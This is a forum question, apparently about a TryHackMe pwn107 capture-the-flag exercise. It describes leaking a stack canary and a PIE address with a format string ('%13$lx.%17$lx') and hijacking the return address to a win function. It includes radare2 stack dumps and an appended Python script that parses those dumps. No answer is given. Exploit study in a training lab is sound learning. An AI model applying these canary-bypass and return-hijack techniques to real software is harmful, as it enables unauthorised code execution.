Asked by: Christian Sanchez  Asked: 10/30/2023  Updated: 10/30/2023  Views: 11
Debugging a buffer overflow using ret2get_address()
Q:
I am trying to exploit the buffer overflow in TryHackMe > PWN101 > pwn107.
The exploit uses a format string vulnerability to leak the canary and a dynamic address, so that we can compute the address of get_address(), a.k.a. our win function (which contains /bin/sh), and hijack the return address. We also have to overwrite the canary with itself.
I am writing my exploit in Python with pwntools, and debugging with radare2.
The binary has PIE, NX, and a canary.
I have successfully leaked the canary and the dynamic address of main. (Well, I really think it is main, because in radare2 it shows as: 0x7ffd3045a928 0x0000560418400992 [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text main,main,r13,r9 main program R X 'push rbp' 'pwn107.pwn107')
I can successfully overwrite the canary, because I don't get a "stack smashing" error.
After sending the format string "%13$lx.%17$lx", our stack looks like this:
[0x560418400a36]> pxr @ rsp
0x7ffd3045a8d0 0x252e786c24333125 %13$lx.% @ rsp ascii ('%')
0x7ffd3045a8d8 0x00000a786c243731 17$lx...
0x7ffd3045a8e0 0x0000000000000002 ........ 2
0x7ffd3045a8e8 0x000000000f8bfbff ........ 260832255
0x7ffd3045a8f0 0x00007ffd3045ad29 ).E0.... [stack] stack R W 0x34365f363878 x86_64
0x7ffd3045a8f8 0x0000000000000064 d....... 100 ascii ('d')
0x7ffd3045a900 0x0000000000001000 ........ 4096
0x7ffd3045a908 0xd0f326fd5de89c00 ...].&..
0x7ffd3045a910 0x0000000000000001 ........ @ rbp 1
0x7ffd3045a918 0x00007f5b1f029d90 ....[... /usr/lib/x86_64-linux-gnu/libc.so.6 library R X 'mov edi, eax' 'libc.so.6'
0x7ffd3045a920 ..[ null bytes ].. 00000000
0x7ffd3045a928 0x0000560418400992 [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text main,main,r13,r9 main program R X 'push rbp' 'pwn107.pwn107'
0x7ffd3045a930 0x000000013045aa10 ..E0.... 5104839184
0x7ffd3045a938 0x00007ffd3045aa28 (.E0.... [stack] r12 stack R W 0x7ffd3045c3d6
0x7ffd3045a940 ..[ null bytes ].. 00000000
0x7ffd3045a948 0x30f586575c89a646 F..\W..0
0x7ffd3045a950 0x00007ffd3045aa28 (.E0.... [stack] r12 stack R W 0x7ffd3045c3d6
0x7ffd3045a958 0x0000560418400992 [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text main,main,r13,r9 main program R X 'push rbp' 'pwn107.pwn107'
0x7ffd3045a960 ..[ null bytes ].. 00000000
*** deleted irrelevant lines***
Our canary is at: 0x7ffd3045a908. The return address is at: 0x7ffd3045a918. The address of main() that we leak to bypass PIE is at: 0x7ffd3045a928
Then, after successfully leaking the canary and the address of main(), our stack looks like this:
[0x560418400a36]> pxr @ rsp
0x7ffd3045a8d0 0x252e786c24333125 %13$lx.% @ rsp ascii ('%')
0x7ffd3045a8d8 0x00000a786c243731 17$lx...
0x7ffd3045a8e0 0x0000000000000002 ........ 2
0x7ffd3045a8e8 0x000000000f8bfbff ........ 260832255
0x7ffd3045a8f0 0x4141414141414141 AAAAAAAA @ rsi ascii ('A')
0x7ffd3045a8f8 0x4141414141414141 AAAAAAAA ascii ('A')
0x7ffd3045a900 0x4141414141414141 AAAAAAAA ascii ('A')
0x7ffd3045a908 0xd0f326fd5de89c00 ...].&..
0x7ffd3045a910 0x4242424242424242 BBBBBBBB @ rbp ascii ('B')
0x7ffd3045a918 0x00000000000006fe ........ 1790
0x7ffd3045a920 0x000056041840094c [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text get_streak sym.get_streak program R X 'push rbp' 'pwn107.pwn107'
0x7ffd3045a928 0x000056041840090a [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text sym.setup program R X 'add eax, 0xfffe10e8' 'pwn107.pwn107'
*** deleted irrelevant lines***
As you can see, the canary is correctly overwritten, rbp is overwritten, then a ret gadget (for stack alignment), and then we correctly hijack the return address. So why isn't a shell being popped?
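As an added example (not code from the question or from the TryHackMe room), the script below parses the address and value columns of the two radare2 `pxr @ rsp` dumps quoted above and classifies each slot of interest, so that a reader can check at a glance whether the canary slot is preserved between the two dumps and whether the saved-return slot holds a pointer into the binary's text pages, a library pointer, or a small integer. The classification heuristics, the slot constants and the function names are assumptions made for this illustration, and the sample dumps are trimmed copies of the lines shown in the question.

```python
import re

# Constructed sample input: address/value columns of the two `pxr @ rsp` dumps
# quoted in the question (annotation columns dropped; a "..[ null bytes ].."
# line carries no hex value and is skipped by the parser).
RSP = 0x7ffd3045a8d0            # rsp at the time of the dump
MAIN = 0x0000560418400992       # slot annotated 'main' in the first dump
CANARY_SLOT = 0x7ffd3045a908    # assumed from the question's analysis
RET_SLOT = 0x7ffd3045a918

BEFORE = """\
0x7ffd3045a8f0 0x00007ffd3045ad29
0x7ffd3045a8f8 0x0000000000000064
0x7ffd3045a908 0xd0f326fd5de89c00
0x7ffd3045a910 0x0000000000000001
0x7ffd3045a918 0x00007f5b1f029d90
0x7ffd3045a920 ..[ null bytes ].. 00000000
0x7ffd3045a928 0x0000560418400992
"""
AFTER = """\
0x7ffd3045a8f0 0x4141414141414141
0x7ffd3045a908 0xd0f326fd5de89c00
0x7ffd3045a910 0x4242424242424242
0x7ffd3045a918 0x00000000000006fe
0x7ffd3045a920 0x000056041840094c
0x7ffd3045a928 0x000056041840090a
"""

LINE = re.compile(r"^(0x[0-9a-f]+)\s+(0x[0-9a-f]{16})\b", re.M)

def parse_pxr(dump):
    """Map stack slot address -> 8-byte value for each line with a hex value."""
    return {int(a, 16): int(v, 16) for a, v in LINE.findall(dump)}

def classify(value, main=MAIN, rsp=RSP):
    """Rough slot classification (assumed heuristics, not radare2's own logic)."""
    text_base = main & ~0xfff
    if 0 <= value - text_base < 0x100000:      # within ~1 MiB of the PIE text page
        return "binary"
    if abs(value - rsp) < 0x100000:             # near the current stack pointer
        return "stack"
    if value >> 40 == 0x7f:                     # typical mmap'd library range
        return "libc"
    if value < 0x10000:                         # counter, flag, or an unrelocated offset
        return "small-int"
    b = value.to_bytes(8, "little")
    if len(set(b)) == 1 and 0x20 <= b[0] < 0x7f:
        return "fill"                           # e.g. 'AAAAAAAA' padding
    if value & 0xff == 0:                       # glibc canaries end in a zero byte
        return "canary"
    return "unknown"

def compare(before, after, slots=(CANARY_SLOT, RET_SLOT)):
    """Per slot: (class before, class after, value unchanged?)."""
    b, a = parse_pxr(before), parse_pxr(after)
    return {s: (classify(b[s]), classify(a[s]), b[s] == a[s]) for s in slots}
```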
A: No answers yet
Comments